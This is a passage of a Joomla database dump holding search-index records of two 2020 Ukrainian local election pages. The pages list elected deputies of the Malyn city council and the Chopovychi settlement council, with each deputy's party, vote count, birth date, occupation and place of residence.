Пиріжки, Коростенський р-н, Житомирська обл.</p></td><td><p>132</p></td><td><p>44,74</p></td><td><p>2</p></td></tr><tr><td><p>2</p></td><td><p>Лісовський Юрій Володимирович</p></td><td><p>Громадянин України, народився 14.12.1967    р., освіта вища, безпартійний, ТОВ \"Юнігран\", Начальник    дробарно-сортувальної дільниці, місце проживання: м. Малин, Коростенський    р-н, Житомирська обл.</p></td><td><p>163</p></td><td><p>55,25</p></td><td><p>2</p></td></tr><tr><td><p>3</p></td><td><p>Ліпей Надія Володимирівна</p></td><td><p>Громадянка України, народилася 02.07.1970    р., освіта середня спеціальна, безпартійна, Компанія \"Юнігран\",    Завідуюча складами, місце проживання: с. Українка, Коростенський р-н,    Житомирська обл.</p></td><td><p>207</p></td><td><p>70,16</p></td><td><p>3</p></td></tr><tr><td><p>3</p></td><td><p>Євдокименко Валерій Петрович</p></td><td><p>Громадянин України, народився 01.02.1970    р., освіта вища, безпартійний, ТОВ \"Юнігран\", Головний енергетик,    місце проживання: смт Гранітне, Коростенський р-н, Житомирська обл.</p></td><td><p>215</p></td><td><p>72,88</p></td><td><p>3</p></td></tr><tr><td><p>3</p></td><td><p>Кашиця В’ячеслав Михайлович</p></td><td><p>Громадянин України, народився 23.11.1962    р., освіта вища, безпартійний, ПМП \"Полісся\", Генеральний директор,    місце проживання: с. Забране, Коростенський р-н, Житомирська обл.</p></td><td><p>217</p></td><td><p>73,55</p></td><td><p>3</p></td></tr><tr><td><p>4</p></td><td><p>Савченко Микола Іванович</p></td><td><p>Громадянин України, народився 28.08.1962    р., освіта вища, безпартійний, АТ \"Коростенський кар’єр\", Заступник    начальника з гірничого цеху, місце проживання: м. Коростень, Коростенський    р-н, Житомирська обл.</p></td><td><p>201</p></td><td><p>68,13</p></td><td><p>4</p></td></tr><tr><td><p>4</p></td><td><p>Гончаренко Галина Аркадіївна</p></td><td><p>Громадянка України, народилася 16.05.1967    р., освіта вища, безпартійна, Любовицька сільська рада, Бухгалтер, місце    проживання: с. Любовичі, Коростенський р-н, Житомирська обл.</p></td><td><p>233</p></td><td><p>78,98</p></td><td><p>4</p></td></tr><tr><td><p>4</p></td><td><p>Гаєвський Петро Петрович</p></td><td><p>Громадянин України, народився 29.05.1986    р., освіта вища, безпартійний, Малинського ДП \"Лісгосп АПК\",    Директор, місце проживання: м. Малин, Коростенський р-н, Житомирська обл.</p></td><td><p>237</p></td><td><p>80,33</p></td><td><p>4</p></td></tr><tr><td><p>Політична    партія \"Перемога Пальчевського\"</p></td></tr><tr><td><p>Перший кандидат</p></td><td><p>Парфіненко Наталія Юріївна</p></td><td><p>Громадянка України, народилася 31.08.1987    р., освіта вища, безпартійна, Малинівська сільська рада Малинського району,    Сільський голова, місце проживання: м. Малин, Коростенський р-н, Житомирська    обл.</p></td><td><p>ЄБВО</p></td></tr><tr><td><p>1</p></td><td><p>Кисельчук Дмитрій Васильович</p></td><td><p>Громадянин України, народився 09.08.1981    р., освіта вища, безпартійний, Тимчасово не працює, місце проживання: м.    Малин, Коростенський р-н, Житомирська обл.</p></td><td><p>37</p></td><td><p>12,54</p></td><td><p>ЄБВО</p></td></tr><tr><td><p>2</p></td><td><p>Войтюк Оксана Романівна</p></td><td><p>Громадянка України, народилася 08.11.1968    р., освіта вища, безпартійна, ТОВ \"СВІТ-КОНСАЛТ\", Головний    бухгалтер, місце проживання: м. Малин, Коростенський р-н, Житомирська обл.</p></td><td><p>20</p></td><td><p>6,77</p></td><td><p>ЄБВО</p></td></tr><tr><td><p>3</p></td><td><p>Лазарчук Людмила Анатоліївна</p></td><td><p>Громадянка України, народилася 17.02.1969    р., освіта вища, безпартійна, Тимчасово не працює, місце проживання: с.    Федорівка, Малинський р-н, Житомирська обл.</p></td><td><p>59</p></td><td><p>20,00</p></td><td><p>ЄБВО</p></td></tr><tr><td><p>ПОЛІТИЧНА    ПАРТІЯ \"СЛУГА НАРОДУ\"</p></td></tr><tr><td><p>Перший кандидат</p></td><td><p>Рудченко Юрій Миколайович</p></td><td><p>Громадянин України, народився 04.05.1981 р., освіта вища,    безпартійний, Фізична особа-підприємець, місце проживання: м. Житомир,    Житомирська обл.</p></td><td><p>ЄБВО</p></td></tr><tr><td><p>1</p></td><td><p>Майстренко Василь Петрович</p></td><td><p>Громадянин України, народився 06.01.1982    р., освіта вища, безпартійний, АТ Житомиробленерго, юрист, місце проживання:    м. Малин, Коростенський р-н, Житомирська обл.</p></td><td><p>26</p></td><td><p>8,81</p></td><td><p>ЄБВО</p></td></tr><tr><td><p>2</p></td><td><p>Грищенко Вячеслав Миколайович</p></td><td><p>Громадянин України, народився 17.07.1979    р., освіта вища, безпартійний, пенсіонер, місце проживання: м. Малин,    Коростенський р-н, Житомирська обл.</p></td><td><p>33</p></td><td><p>11,18</p></td><td><p>ЄБВО</p></td></tr><tr><td><p>2</p></td><td><p>Бенчук Андрій Леонідович</p></td><td><p>Громадянин України, народився 11.05.1991    р., освіта вища, безпартійний, Державна Екологічна інспекція Поліського    округу, Інспектор з ОНПС, місце проживання: м. Малин, Коростенський р-н,    Житомирська обл.</p></td><td><p>39</p></td><td><p>13,22</p></td><td><p>2</p></td></tr></tbody></table><p><br></p>\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:1:\"8\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2020-12-16 12:48:19\";s:11:\"modified_by\";s:3:\"430\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:1:\"3\";s:8:\"ordering\";s:1:\"1\";s:8:\"category\";s:14:\"головна\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:37:\"2487:deputati-malinskoji-miskoji-radi\";s:7:\"catslug\";s:10:\"8:novini-2\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:59:\"/index.php/8-novini-2/2487-deputati-malinskoji-miskoji-radi\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:14:\"головна\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:14:\"головна\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2487\";s:5:\"route\";s:90:\"index.php?option=com_content&view=article&id=2487:deputati-malinskoji-miskoji-radi&catid=8\";s:5:\"title\";s:62:\"Депутати Малинської міської ради \";s:11:\"description\";s:297:\" Коростенський р-н, Малинська міська рада Кількість депутатів місцевої ради, які обираються на відповідних виборах 34 Кількість обраних депутатів місцевої ради 34 \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2020-11-08 18:31:46\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2020-11-08 18:31:46\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4762,'index.php?option=com_content&view=article&id=2486','index.php?option=com_content&view=article&id=2486:deputati-chopovitskoji-selishchnoji-radi&catid=8','Депутати Чоповицької селищної ради ',' ','2020-12-16 14:49:18','fb2be215a32760738a1e7824e9941c30',1,1,1,'*','2020-11-03 14:56:23','0000-00-00 00:00:00','2020-11-03 14:56:23','0000-00-00 00:00:00',0,0,4,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2486\";s:5:\"alias\";s:40:\"deputati-chopovitskoji-selishchnoji-radi\";s:7:\"summary\";s:25:\"<table><tbody><tr><td><p>\";s:4:\"body\";s:12209:\"Висування    (назва політичної партії, місцева організація якої висунула кандидата, або    самовисування)</p></td><td><p>Кількість обраних    депутатів</p></td><td><p>%</p></td></tr><tr><td><p>Політична партія \"НАШ КРАЙ\"</p></td><td><p>16</p></td><td><p>72.73</p></td></tr><tr><td><p>ПОЛІТИЧНА ПАРТІЯ \"СЛУГА НАРОДУ\"</p></td><td><p>2</p></td><td><p>9.09</p></td></tr><tr><td><p>ПОЛІТИЧНА ПАРТІЯ \"ЄВРОПЕЙСЬКА СОЛІДАРНІСТЬ\"</p></td><td><p>2</p></td><td><p>9.09</p></td></tr><tr><td><p>Самовисування</p></td><td><p>1</p></td><td><p>4.55</p></td></tr><tr><td><p>політична партія Всеукраїнське об’єднання    \"Батьківщина\"</p></td><td><p>1</p></td><td><p>4.55</p></td></tr></tbody></table><br><table><tbody><tr><td><p>№ ОВО</p></td><td><p>Прізвище, ім\'я, по    батькові</p></td><td><p>Висування</p></td><td><p>Відомості про обраного    депутата</p></td></tr><tr><td><p>1</p></td><td><p>Дєньгаєва Ніна Олександрівна</p></td><td><p>Політична партія \"НАШ КРАЙ\"</p></td><td><p>Громадянка України, народилася 13.06.1963    р., освіта середня спеціальна, безпартійна, Чоповицька селищна рада,    Секретар, місце проживання: с-ще Чоповичі, Малинський р-н,Житомирська обл</p></td></tr><tr><td><p>1</p></td><td><p>Косинський Володимир Іванович</p></td><td><p>Політична партія \"НАШ КРАЙ\"</p></td><td><p>Громадянин України, народився 05.04.1989    р., освіта вища, безпартійний, Чоповицька селищна рада, Начальник відділу,    місце проживання: с-ще Чоповичі, Малинський р-н,Житомирська обл</p></td></tr><tr><td><p>1</p></td><td><p>Харченко Сергій Миколайович</p></td><td><p>Політична партія \"НАШ КРАЙ\"</p></td><td><p>Громадянин України, народився 01.01.1977 р., освіта вища,    безпартійний, ДП\"Малинський ЛГ АПК\", Лісничий, місце проживання:    с-ще Чоповичі, Малинський р-н, Житомирська обл</p></td></tr><tr><td><p>2</p></td><td><p>Раєць Віктор Володимирович</p></td><td><p>Політична партія \"НАШ КРАЙ\"</p></td><td><p>Громадянин України, народився 14.03.1979 р., освіта вища,    безпартійний, КНП\"Чоповицький центр медико-санітарної допомоги\",    Головний лікар, місце проживання: с-ще Чоповичі, Малинський р-н,Житомирська    обл</p></td></tr><tr><td><p>2</p></td><td><p>Філоненко Михайло Миколайович</p></td><td><p>ПОЛІТИЧНА ПАРТІЯ \"СЛУГА НАРОДУ\"</p></td><td><p>Громадянин України, народився 22.11.1982    р., освіта вища, безпартійний, Верховна Рада України, Помічник-консультант    народного депутата України Грищенко Т.М., місце проживання: м. Малин,    Малинський р-н,Житомирська обл..</p></td></tr><tr><td><p>2</p></td><td><p>Філоненко Оксана Олександрівна</p></td><td><p>Політична партія \"НАШ КРАЙ\"</p></td><td><p>Громадянка України, народилася 02.10.1980    р., освіта середня спеціальна, безпартійна, ФОП\"Філоненко О.О.\",    місце проживання: с-ще Чоповичі, Малинський р-н,Житомирська обл</p></td></tr><tr><td><p>2</p></td><td><p>Шпакович Валентина Василівна</p></td><td><p>Політична партія \"НАШ КРАЙ\"</p></td><td><p>Громадянка України, народилася 20.07.1968 р., освіта середня    спеціальна, безпартійна, Чоповицька селищна рада, Спеціаліст відділу    кадрового і правового забезпечення, місце проживання: с-ще Чоповичі,    Малинський р-н,Житомирська обл</p></td></tr><tr><td><p>3</p></td><td><p>Дученко Крістіна Володимирівна</p></td><td><p>Політична партія \"НАШ КРАЙ\"</p></td><td><p>Громадянка України, народилася 02.12.1993    р., освіта загальна середня, безпартійна, Перукарня \"Kristina\", Перукар, місце проживання: С.Загребля    Малинський р-н,Житомирська обл</p></td></tr><tr><td><p>3</p></td><td><p>Шпакович Тетяна Іванвна</p></td><td><p>ПОЛІТИЧНА ПАРТІЯ \"ЄВРОПЕЙСЬКА СОЛІДАРНІСТЬ\"</p></td><td><p>Громадянка України, народилася 25.09.1978    р., освіта вища, безпартійна, Будинок культури с.Барвінки, Завідуюча, місце    проживання: с.Новобратське,Малинський р-н,Житомирська обл.</p></td></tr><tr><td><p>4</p></td><td><p>Недашківська Людмила Миколаївна</p></td><td><p>ПОЛІТИЧНА ПАРТІЯ \"СЛУГА НАРОДУ\"</p></td><td><p>Громадянка України, народилася 05.11.1971    р., освіта вища, безпартійна, Чоповицька селищна рада, Староста, місце    проживання: с. Новобратське, Малинський р-н, Житомирська обл..</p></td></tr><tr><td><p>4</p></td><td><p>Фещенко Михайло Іванович</p></td><td><p>Самовисування</p></td><td><p>Громадянин України, народився 04.01.1956    р., освіта середня спеціальна, безпартійний, пенсіонер, місце проживання:    с.Барвінки,Малинський р-н,Житомирська обл..</p></td></tr><tr><td><p>5</p></td><td><p>Александрук Микола Володимирович</p></td><td><p>Політична партія \"НАШ КРАЙ\"</p></td><td><p>Громадянин України, народився 19.06.1960    р., освіта вища, безпартійний, пенсіонер, місце проживання:    с.Йосипівка,Малинський р-н,Житомирська обл..</p></td></tr><tr><td><p>5</p></td><td><p>Мойсієнко Микола Миколайович</p></td><td><p>Політична партія \"НАШ КРАЙ\"</p></td><td><p>Громадянин України, народився 30.04.1960    р., освіта середня спеціальна, безпартійний, ТОВ ФНК \"Ельфа\",    Інженер з охорони праці, місце проживання: с-ще Чоповичі,Малинський    р-н,Житомирська обл..</p></td></tr><tr><td><p>5</p></td><td><p>Петровський Аркадій Петрович</p></td><td><p>Політична партія \"НАШ КРАЙ\"</p></td><td><p>Громадянин України, народився 20.07.1967 р., освіта вища,    безпартійний, Йосипівська ЗОШ, Директор, місце проживання:    с.Йосипівка,Малинський р-н,Житомирська обл..</p></td></tr><tr><td><p>5</p></td><td><p>Шоботенко Олександр Володимирович</p></td><td><p>Політична партія \"НАШ КРАЙ\"</p></td><td><p>Громадянин України, народився 18.09.1968 р., освіта середня    спеціальна, безпартійний, ДП\"Малинський ЛГ АПК\", Майстер лісу,    місце проживання: с.Йосипівка,Малинський р-н,Житомирська обл..</p></td></tr><tr><td><p>6</p></td><td><p>Майстренко Тетяна Іванівна</p></td><td><p>Політична партія \"НАШ КРАЙ\"</p></td><td><p>Громадянка України, народилася 30.07.1970    р., освіта загальна середня, безпартійна, ФОП\"Майстренко Т.І.\",    місце проживання: с.Тишів,Малинський р-н,Житомирська обл..</p></td></tr><tr><td><p>6</p></td><td><p>Ярошенко В’ячеслав Петрович</p></td><td><p>політична партія Всеукраїнське об’єднання    \"Батьківщина\"</p></td><td><p>Громадянин України, народився 01.01.1974    р., освіта вища, безпартійний, Фермерське господарство \"Слава    Полісся\", Голова, місце проживання: м.Малин,Житомирська обл..</p></td></tr><tr><td><p>7</p></td><td><p>Дударенко Ірина Рустемівна</p></td><td><p>Політична партія \"НАШ КРАЙ\"</p></td><td><p>Громадянка України, народилася 08.04.1973    р., освіта середня спеціальна, безпартійна, Скуратівська сільська рада,    Секретар, місце проживання: с. Скурати,Малинський р-н,Житомирська обл..</p></td></tr><tr><td><p>7</p></td><td><p>Кондратчук Галина Павлівна</p></td><td><p>ПОЛІТИЧНА ПАРТІЯ \"ЄВРОПЕЙСЬКА СОЛІДАРНІСТЬ\"</p></td><td><p>Громадянка України, народилася 21.06.1962    р., освіта вища, безпартійна, ПОСП \" Скуратівське\", директор, місце    проживання: с.Скурати,Малинський р-н,Житомирська обл..</p></td></tr><tr><td><p>7</p></td><td><p>Романчук Олександр Васильович</p></td><td><p>Політична партія \"НАШ КРАЙ\"</p></td><td><p>Громадянин України, народився 10.05.1983    р., освіта вища, безпартійний, Владівська ЗОШ, Директор, місце проживання:    с.Владівка, Малинський р-н,Житомирська обл..</p></td></tr><tr><td><p>8</p></td><td><p>Закусило Віта Валентинівна</p></td><td><p>Політична партія \"НАШ КРАЙ\"</p></td><td><p>Громадянка України, народилася 24.06.1994    р., освіта вища, безпартійна, Головківський ДНЗ, Вихователь, місце    проживання: с.Головки,Малинський р-н,Житомирська обл.</p></td></tr><tr><td><p>8</p></td><td><p>Олександрук Світлана Миколаївна</p></td><td><p>Політична партія \"НАШ КРАЙ\"</p></td><td><p>Громадянка України, народилася 10.10.1968    р., освіта середня спеціальна, безпартійна, Головківська ЗОШ, Вчитель, місце    проживання: с.Головки,Малинський р-н,Житомирська обл..</p></td></tr></tbody></table><p><br></p>\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:1:\"8\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2020-12-16 12:49:18\";s:11:\"modified_by\";s:3:\"430\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:1:\"4\";s:8:\"ordering\";s:1:\"2\";s:8:\"category\";s:14:\"головна\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:45:\"2486:deputati-chopovitskoji-selishchnoji-radi\";s:7:\"catslug\";s:10:\"8:novini-2\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:67:\"/index.php/8-novini-2/2486-deputati-chopovitskoji-selishchnoji-radi\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:14:\"головна\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:14:\"головна\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2486\";s:5:\"route\";s:98:\"index.php?option=com_content&view=article&id=2486:deputati-chopovitskoji-selishchnoji-radi&catid=8\";s:5:\"title\";s:66:\"Депутати Чоповицької селищної ради \";s:11:\"description\";s:1:\" \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2020-11-03 14:56:23\";s:16:\"publish_end_date\";s:19:\"0000-00-00 